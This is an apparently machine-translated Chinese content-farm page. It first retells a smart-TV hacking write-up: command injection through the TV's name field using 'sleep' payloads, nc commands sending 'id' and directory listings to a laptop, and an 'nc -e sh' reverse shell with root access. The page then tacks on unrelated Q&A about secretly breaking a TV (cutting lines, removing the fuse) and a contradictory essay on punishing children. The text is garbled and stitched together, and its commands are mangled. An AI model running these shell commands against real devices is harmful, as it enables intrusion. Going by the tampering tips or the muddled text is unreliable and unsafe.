弄坏电视小妙招，躺在床上看我们如何入侵我们的智能电视-资源分析-韩韩H5开发

不少网友都想知道关于躺在床上看我们如何入侵我们的智能电视和一些关于弄坏电视小妙招的题，今天小编为你带来详细的解说。

写在前面的话

这是一个昏昏欲睡的夜晚。忙碌了一天的工作后，我想躺在床上安静地看一会儿电视。但在此之前，我的朋友给了我一个路由器，我发现了它的一个安全漏洞。经过一天的辛苦工作后，我试图克制自己不去想这个漏洞，但不，它仍然不断出现在我的脑海中。题是，能够发现这种设备中的漏洞当然是非常有趣的，而且这些漏洞不仅是普通用户发现的，公司的产品开发人员和技术支持部门也发现了这些漏洞。牙科。

故事开始了

那天晚上我太累了，所以我在电视上设定了睡眠时间，很快就上床睡觉了。但在设置我的睡眠时间表时，我的专业直觉引导我滚动设置选项菜单，看看是否有任何仅供开发人员使用的功能。在手机上Google搜索后，我发现这个品牌的智能电视有一个可以打开隐藏菜单的控制代码。

接下来，我使用遥控器将这个控制代码输入到电视设置菜单中，屏幕左侧出现了一个菜单。但我无法访几乎所有选项，我只能访一个名为“酒店模式”的选项，而且我还可以看到电视的版本号。另外，还有一个选项叫做“关于”，我打开这个选项，发现了一个很有趣的东西，那就是我可以为我的智能电视设置一个名称。

智能电视安全漏洞

信息安全从业人员可能会无意识地测试他们在其他地方常用的有效负载，可能是路由器的Web界面或打印机控制面板上的GET参数。这是一台智能电视。然后我随机将电视命名为“睡眠5”。

设置完成后，电视停止响应并冻结了很长时间。根据您的回复，我更改了电视名称。电视在更改设置后经常会冻结几秒钟，所以当时我并不认为我发现了命令注入漏洞，但这次它冻结了一点。因为时间太长了，这也引起了我的好奇心。

由于暂停时间超过了5秒，并且与电视名称中设置的“5”不匹配，我怀疑系统正在对这个数字进行一些特殊处理。当然，也可能是因为您的电视不支持该参数，可能会导致电视表现异常，导致卡顿。然而，当我尝试将名称更改为“睡眠0”时，电视并没有停止。

事实就摆在我的面前，但我不知道为什么，所以我就想着测量一下这个数字和时间之间的数学关系。该名称乘以3就是电视的实际响应间隔。例如

sleep26秒sleep39秒sleep515秒在智能电视上执行远程命令

你能相信这一点吗？我第一次尝试就发现了一个命令注入漏洞！然而，冻结菜单并不能使其成为令人信服的PoC，并且在实际攻击中几乎没有什么用处。此处只能输入31个字符，因此删除两个引号意味着负载中只剩下29个字符。

下面列出了我尝试过的命令。

因为已经是深夜了，我决定先去睡觉，看看第二天能不能拿到电视壳。第二天我醒来，赶紧拿起笔记本电脑和网线开始工作，最兴奋的是我可以通过遥控器运行智能电视的系统命令。

为您的智能电视准备一个外壳

电视挂在墙上，所以插网线的过程有点困难，因为我的肩膀不对齐，但我最终插上了网线并将其连接到我的笔记本电脑。使用ipconfig命令确定笔记本电脑的IP地址。

现在您已经知道笔记本电脑的IP地址，您所要做的就是为笔记本电脑获取反向shell，而无需知道电视的IP地址。而且，反向shell可以绕过所有防火墙规则。但在此之前，您需要对这款智能电视有更多的了解。

在智能电视上使用Netcat

我发现智能电视上默认安装了“nc”。因此，我可以使用“nc”命令将特定命令的输出传输回我的笔记本电脑。当然，它首先测试的是“id”，它的执行结果会告诉你你的智能电视是否有root权限。

如上，输出显示您已经拥有root权限。这并不奇怪，但这仍然是个好消息。接下来，我们计划使用命令`ls-la/|nc169254562165`来获取根目录下的文件列表。

到目前为止一切都很顺利，但我还没有拿到电视外壳。考虑到电视上默认安装的“nc”版本允许您使用“-e”参数，您可以通过“nc1692542132105-esh”命令获取反向shell。

成功收购智能电视外壳

非常好。现在您有了TVShell，可能性是无限的，例如修改电视启动界面的徽标或修改应用程序图标。由于它是智能电视，因此预装了多种应用程序，例如Youtube和Skype。

我发现大多数智能电视文件系统都具有只读权限，因此我无法从启动界面修改徽标。不过，电视上也有很多画面是经常变换的，比如换台时出现的频道预览画面，这些画面是各个频道的节目截图。显然，这些图像需要存储在文件系统的某个位置，并且可以读取和写入该目录。

经过调查，我发现我系统上的所有图标都是png文件，但是当我使用“find/-namepng”命令查找所有带有png后缀的文件时，我找不到任何这些缩略图。然而，当我用同样的方法搜索jpg文件时，发现了一个类似于channelImage123jpg的文件名，于是我将通道图像文件替换为其他图像，结果如下。

你的智能电视可能没有你想象的那么智能

物联网设备中的漏洞往往存在于许多不被注意的地方，而这些地方很容易被忽视。在测试“sleep”命令时，我不知道它可能会导致漏洞。为了避免无聊，我用“睡眠”来命名我的电视。另外，我真的印象深刻，因为我没有意识到我的智能电视在Linux上运行，而且我发现的漏洞可以被利用。

尽管无法远程利用此漏洞，但我们建议您禁用智能电视上的一些智能程度较低的功能。因为我们谁都不想让别人控制我们的电视。

引用

一、怎么把电视弄坏无痕迹不给孩子看？

您可以剪断网络信号线或使用损坏的插座。您也可以打开电视后盖并取出保险丝。如果您不想这样做，可能会出现一些很容易修复的小缺陷。但电视如果长时间不使用，可能会返潮，或者电视因长期缺电而损坏，需要家长和孩子的智慧和勇气。

二、孩子弄坏电视机怎么惩罚？

出发点就错了。惩罚只是手段，而不是目的。惩罚的最终目的是为了教育好孩子。题应该转向父母应该如何教育孩子以及在教育中使用惩罚方法时应该注意什么。每个孩子都是不同的，不应该被当作机器或宠物对待。惩罚没有真正的模式，但有原则，例如找出孩子这样做的原因。如果父母不理解，他们所做的一切显然都是错误的。家长一定要想清楚自己为什么要受到惩罚，哪些行为应该受到惩罚。体罚首先是父母态度的表现，明确哪些行为是他们赞成的，哪些是他们不赞成的。惩罚的条款需要和孩子好好沟通，商定超过三页纸，但条款一定要合理，孩子能接受，然后按照孩子说的去做，建立这个权威很重要。惩罚是必要的，但又无法避免。最后的措施。对孩子的惩罚一般有四种1-冷处理。2-临时隔离。3-禁止某些权利和要求，例如不允许儿童出去玩耍或看电视。4-暂时没收心爱的物品。注意一个原则加重处罚原则。孩子第一次、第二次甚至第三次犯同样的行为时，惩罚可能会加重。另外，家长不能用实际的激励来刺激孩子，最好用精神上的激励，现在的孩子更注重心理和精神上的满足。体罚的关键是父母必须要有清醒的头脑和坚定不移的态度。惩罚要明确，不能让孩子觉得微不足道。既然采用了这个方法，就需要坚持下去，一路上不要放弃。否则，会让孩子觉得你好办，会降低你在孩子心目中的声誉，更重要的是，不利于他们认识到自己的错误。但也要注意分析孩子犯错的原因，根据实际情况惩罚孩子。惩罚越多，效果越差，但忽视它、不在意它却更有效。有时你的孩子想取笑你以引起注意，或者你不理睬他们。你惩罚得越多，效果就越差。惩罚是训练中最难的部分，所以不要使用它。如果你真的想用它，你必须注意这些题。每个家长或老师惩罚孩子的方式都不同，但无论你如何惩罚孩子，惩罚都是必须的，因为惩罚只是爱的一种手段。缓和。家长首先要了解孩子出现不当行为的原因，然后以适当的方式应对。然而，如果孩子通过扔东西或打人来达到自己的目的，父母就需要用适当的惩罚来让孩子知道这种行为是错误的。体罚有五个主要原则。1-不要对人这样做，让你的孩子清楚你为什么要惩罚他们，最重要的是，教他们正确的行为。2-选择适当的惩罚方式，提高教育效果。3-不要以报复、旧账、联合等方式惩罚你的孩子。4-不要在公共场所惩罚孩子，照顾他们的自尊。5、惩罚后，适当安慰孩子，告诉孩子你真的很爱孩子，希望孩子能做得更好。惩罚孩子还有一点要注意的是，惩罚孩子的时候一定要小心，要平复自己的情绪，不要惩罚生气的孩子。